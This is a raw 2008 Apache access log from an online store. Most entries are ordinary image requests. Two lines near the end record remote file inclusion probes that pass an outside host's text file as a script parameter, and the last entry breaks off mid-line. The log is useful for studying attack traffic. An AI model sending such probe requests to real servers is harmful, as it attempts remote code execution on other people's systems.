24.228.10.78 - - [03/Oct/2008:01:42:24 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:24 -0400] "GET /images/items/3232000_THUMB.JPG HTTP/1.1" 200 1058 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:24 -0400] "GET /images/items/3231000_THUMB.JPG HTTP/1.1" 200 3373 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:24 -0400] "GET /images/items/3233000_THUMB.JPG HTTP/1.1" 200 1941 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:27 -0400] "GET /images/items/3231001_THUMB.JPG HTTP/1.1" 200 939 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:27 -0400] "GET /images/items/3231003_THUMB.JPG HTTP/1.1" 200 1116 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:28 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:33 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:33 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:36 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:37 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:37 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
74.53.127.68 - - [03/Oct/2008:01:42:38 -0400] "GET /logs/error_log.Q108060300/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
61.129.78.149 - - [03/Oct/2008:01:42:38 -0400] "GET /logs/access_log.Q108082300//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.814"
209.59.12.99 - - [03/Oct/2008:01:42:58 -0400] "GET / HTTP/1.0" 200 409 "-" "